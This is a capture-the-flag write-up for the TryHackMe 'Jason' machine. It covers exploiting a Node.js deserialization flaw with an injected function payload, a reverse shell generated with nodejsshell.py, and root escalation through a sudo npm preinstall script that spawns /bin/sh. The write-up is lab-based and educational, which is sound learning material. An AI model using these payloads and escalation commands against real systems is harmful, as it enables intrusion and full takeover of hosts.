“The only true wisdom is in knowing you know nothing.” - Socrates

Updated on 12 October 2021

Jason – Easy

In this writeup, we will cover a great machine by ‘elbee‘ on TryHackMe.
Room: https://tryhackme.com/room/jason

Summary

  • Enumeration: Port 22 and 80
  • NodeJS application running on port 80
  • User input processed and reflected in server response.
  • Identified JS deserialization vulnerability
  • Generate reverse shell payload using nodejsshell.py
  • Inject the payload in the email parameter
  • Send GET request to “/” with the Cookie received.
  • Shell spawn as the user dylan
  • View what commands can dylan run with sudo: sudo -l
  • Leverage npm with sudo to execute /bin/sh as root.
  • All done 😀

Enumeration

  • The NMAP results showed that ports 22 and 80 were open.
  • Opening the application running on port 80, we see the following and notice that it says “Built with nodejs”
  • Inspecting the source code of this page, we find JS code, which sends a POST request to the server endpoint with the email input from the user. http://window.location.href?email="UserEmailAddress"
  • When we submit an email address using the form, we notice that there is a session cookie set in the HTTP response.
  • We decode the cookie value and find that it reflects the input provided by us in the request.
  • We then send a GET request to the “/” endpoint with the cookie and find that the value is reflected in HTTP response.
  • Since our value was reflected in the HTTP response, we tried to send a serialized payload as the email parameter. _$$ND_FUNC$$_function (){ return 'deser_test'; }()

Exploitation

  • We found that our code was successfully executed, therefore, the deser_test in the HTTP response.
  • Then we tried to get a reverse shell using this vulnerability..
  • Firstly, we generated our shell code using python nodejsshell.py {listeningip} {port}
  • Then, we append _$ND_FUNC$_function (){ before the payload and }() after the payload.
  • We got in the host as the user dylan
  • Looking inside the home directory for ‘dylan’ we found the user.txt
  • By running sudo -l, we found that the user dylan can run /usr/bin/npm with sudo.
  • Therefore, we leverage that to escalate our privileges to root.

Privilege Escalation

Commands used for above:

  • mkdir /home/dylan/privesc
  • cd /home/dylan
  • echo '{"scripts": {"preinstall": "/bin/sh"}}' > privesc/package.json
  • sudo /usr/bin/npm -C privesc --unsafe-perm i

All done!

Hope you enjoyed reading this writeup.
Happy Hunting! 😀

Helpful Links

CONTENTS